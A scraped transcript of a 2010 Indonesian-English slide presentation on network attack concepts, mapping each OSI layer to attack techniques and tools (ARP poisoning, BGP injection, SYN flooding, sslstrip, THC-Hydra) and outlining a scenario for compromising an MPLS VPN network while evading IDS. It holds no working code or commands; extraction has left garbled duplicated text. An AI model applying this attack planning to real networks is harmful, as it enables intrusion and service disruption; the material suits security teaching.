deep knowledge on network hacking philosopy
DESCRIPTION
Presentation about network hacking philosopy in deep!TRANSCRIPT
DEEP KNOWLEDGE ONDEEP KNOWLEDGE ONNETWORK HACKING PHILOSOPYNETWORK HACKING PHILOSOPY
ATIK PILIHANTOMAKASAR, DEC 2010http://ipsecs.com
PHILOSOPYPHILOSOPYPHILOSOPYPHILOSOPY
Pengetahuan secara general dan fundamental mengenai g g gobjective dari sebuah masalahNetwork Hacking Philosopy??
jDasar dan pemahaman fundamental mengenai jaringan komputer dan vulnerability pada protokol komunikasiLet’s start to understand our network!Let s start to understand our network!
OSI MODELOSI MODELOSI MODELOSI MODEL
OSI model 7 layer : physical, data link, network, transport, y p y psession, presentation, dan application
RELASI HACKING DAN OSIRELASI HACKING DAN OSI
OSI mendeskripsikan secara general dan fundamental bagaimana komunikasi gdigital bekerja
Teknologi pada setiap layer??
Is this technology exist in your network? Or which technology is used?
Vulnerability attack vector impact dan Vulnerability, attack vector, impact, dan how to exploit?
OSI : Layer #1OSI : Layer #1 PhysicalPhysicalOSI : Layer #1 OSI : Layer #1 ‐‐ PhysicalPhysical
Contoh Teknologi; IEEE 802.3, IEEE 802.11, IEEE 802.16; /SONET/SDH, ADSL
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #1? physical access?Impact; sebagian besar besar Denial of Service.Contoh Vulnerability; N/AHow to exploit; pemotongan kabel fiber dan wireless How to exploit; pemotongan kabel fiber dan wireless (802.11/802.16) signal jamming Not so interesting, but sometimes occurred!
OSI : Layer #2OSI : Layer #2 –– Data LinkData LinkOSI : Layer #2 OSI : Layer #2 –– Data LinkData Link
C t h T k l i L 2 it h (IEEE 802 3) ARP ATM d Contoh Teknologi; Layer 2 switch (IEEE 802.3), ARP, ATM, dan frame relay.
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #2? Local Area Network?Layer #2? Local Area Network?
Impact; Pelanggaran confidentiality dan integrity, Denial of Service
Contoh Vulnerability; Limitasi switch CAM table dan ARP cache poisoningpoisoning
How to exploit; Flooding CAM table dan ARP cache poisoning dengan tujuan DoS atau Man in The Middle, yersinia L2 attack toolkit
E l i i d l # i di k bi ik d b b i Exploitasi pada layer #2 sering di kombinasikan dengan berbagai serangan lain misalnya sniffing dan replay attack.
OSI : Layer #3OSI : Layer #3 –– NetworkNetworkOSI : Layer #3 OSI : Layer #3 –– NetworkNetwork
C h T k l i IP ICMP IPSEC d R i lContoh Teknologi; IP, ICMP, IPSEC, dan Routing protocol.
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #3? Remotely accessible?
Impact; Pelanggaran confidentiality dan integrity, Denial of Service
Contoh Vulnerability; packet spoofing, celah keamanan routing protocol, dan celah kemanan ipsecdan celah kemanan ipsec
How to exploit; IP spoofing, IP fragmentation, ICMP smurfing, BGPman in the middle, BGP NLRI injection, LDP injection on MPLS, GRE traffic tunneling, dan loki projecttraffic tunneling, dan loki project
Exploitasi pada layer #3 sering di kombinasikan dengan berbagai serangan lain misalnya sniffing
OSI : Layer #4OSI : Layer #4 –– TransportTransportOSI : Layer #4 OSI : Layer #4 –– TransportTransport
C h T k l i UDP TCP SCTPContoh Teknologi; UDP, TCP, SCTP
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #4? Remotely accessible?p y y
Impact; Pelanggaran confidentiality dan integrity, Denial of Service, dan gaining access.
C h l bili k fi d i hij kiContoh Vulnerability; packet spoofing, dan session hijacking
How to exploit; SYN flooding, UDP flooding, TCP session hijacking, SCTP scanning to find SS7 network entry pointj g, g f y p
OSI : Layer #5OSI : Layer #5 –– SessionSessionOSI : Layer #5 OSI : Layer #5 –– Session Session
C h T k l i N BIOS L TP PPTPContoh Teknologi; NetBIOS, L2TP, PPTP
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #5? Remotely accessible?p y y
Impact; Pelanggaran confidentiality dan gaining access.
Contoh Vulnerability; User enumeration
How to exploit; Enumerate user using NetBIOS
OSI : Layer #6OSI : Layer #6 –– PresentationPresentationOSI : Layer #6 OSI : Layer #6 –– PresentationPresentation
C h T k l i SSL TLSContoh Teknologi; SSL, TLS
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #6? Remotely accessible?p y y
Impact; Pelanggaran confidentiality dan integrity, dan gaining access.
C h l bili SS i h iddlContoh Vulnerability; SSL Man in The Middle
How to exploit; Doing SSL Man in The Middle, dsniff, sslstrip
Exploitasi pada layer #6 sering di kombinasikan dengan Exploitasi pada layer #6 sering di kombinasikan dengan berbagai serangan lain misalnya sniffing
OSI : Layer #7OSI : Layer #7 –– ApplicationApplicationOSI : Layer #7 OSI : Layer #7 –– ApplicationApplication
C h T k l i HTTP SMTP DNS SSH FTPContoh Teknologi; HTTP, SMTP, DNS, SSH, FTP
Attack vector; apakah attacker mungkin mengakses teknologi pada Layer #7? Remotely accessible?p y y
Impact; Pelanggaran confidentiality dan integrity, Denial of Service, dan gaining access.
C h l bili b ff fl f i bContoh Vulnerability; buffer overflow, format string, web application vulnerability.
How to exploit; Exploiting buffer overflow /format string to gain p p g ff f f g gaccess or doing service denial, exploiting web application to gain access
KNOWING YOURSELFKNOWING YOURSELFKNOWING YOURSELF KNOWING YOURSELF
In which layer you have access? On layer 1, 2, 3, 4, 5, 6, 7 or all?
The more o close to lo est la er the more o r chance The more you close to lowest layer, the more your chance to win the war
KNOWING YOUR ENEMYKNOWING YOUR ENEMYKNOWING YOUR ENEMYKNOWING YOUR ENEMY
Reconaisance to gain as much as possible information about the enemy
Scanning to gain information hich host is ali e and Scanning to gain information which host is alive and which service is running
The more you have information about your enemy the The more you have information about your enemy, the more your chance to win the war
IF YOU KNOW BOTH YOURSELF AND YOUR ENEMY IF YOU KNOW BOTH YOURSELF AND YOUR ENEMY –– YOU YOU WILL WIN WILL WIN IN IN MANY WARS MANY WARS ‐‐ SUNTZUSUNTZU
THINGS TO REMEMBERTHINGS TO REMEMBERTHINGS TO REMEMBER THINGS TO REMEMBER
Transport set vulnerability:p y
Easy to prevent (Firewall, ACL)
Hard to fix (Update, Patch)
Application set vulnerability:
Hard to prevent (Firewall, ACL)
Easy to fix (Update, Patch)
THINGS TO REMEMBERTHINGS TO REMEMBERTHINGS TO REMEMBERTHINGS TO REMEMBER
Keep anonymous and stealth, don’t be so rough!
Man in the middle example on Layer #2 :
ARP cache poisoning OR CAM table flooding?
Exploiting remote buffer overflow on Layer #7:
Evading IDS/IPS/IDP
Polymorphic, Encoded shell code OR IP fragmentation??
AN EXAMPLEAN EXAMPLE
Router A, B, C, D mengaktifkan layanan BGP dan SSH dan bisa diakses darilaptop attacker dan admin
Attacker tidak terkoneksi ke laptop admin dan berbeda jaringan denganrouter A,B,C, dan D
KNOWING YOUR ENEMYKNOWING YOUR ENEMY
Attacker (you) want to compromise VPN MPLS network
He can’t directly attack administrator computer
After doing host enumeration, he knows that there’s four grouters on the network
After doing service scanning, he knows all routers i i SSH d BGP i iactivating SSH and BGP as its service
After doing vulnerability scanning, he knows some routers has vulnerabilityhas vulnerability
Attacker search in search engine all information related to administrator, email address, and many othersadministrator, email address, and many others
KNOWING YOURSELFKNOWING YOURSELFKNOWING YOURSELFKNOWING YOURSELF
Do you have access to layer #1? Noy y
Do you have access to layer #2? No
Do you have access to layer #3? Yes, useful for exploitationy y # , p
Do you have access to layer #4? Yes, useful for exploitation
Do you have access to layer #5? Yes Not ApplicableDo you have access to layer #5? Yes, Not Applicable
Do you have access to layer #6? Yes, Not Applicable
Do you have access to layer #7? Yes useful for exploitationDo you have access to layer #7? Yes, useful for exploitation
SO WHAT??
LAYER #3 ATTACKLAYER #3 ATTACK
Border Gateway Attack?BGP Man In The Middle
BGP NLRI injection to reroute traffic
BGP MD5 crack if applicable
MPLS Attack?LDP i j i i l b lLDP injection to rewrite label
ICMP?ICMP flooding and denial of serviceICMP flooding and denial of service
Will be really useful if one router has been compromised!
LAYER #4 ATTACKLAYER #4 ATTACKLAYER #4 ATTACKLAYER #4 ATTACK
TCP?
SYN Flooding to SSH and BGP port causing denial of service
TCP FIN/RST to close BGP Established session
UDP and others layer #4 protocol is not applicable
LAYER #7 ATTACKLAYER #7 ATTACKLAYER #7 ATTACKLAYER #7 ATTACK
Exploiting routers vulnerability to gain accessp g y g
Buffer overflow?
Format string?
Denial of service?
Guessing routers user and password to gain access
NCRAK?
THC-Hydra
YES! You can use social engineering but it’s different topic from hacking the network!
QUESTION AND ANSWER QUESTION AND ANSWER
THANK YOUTHANK YOU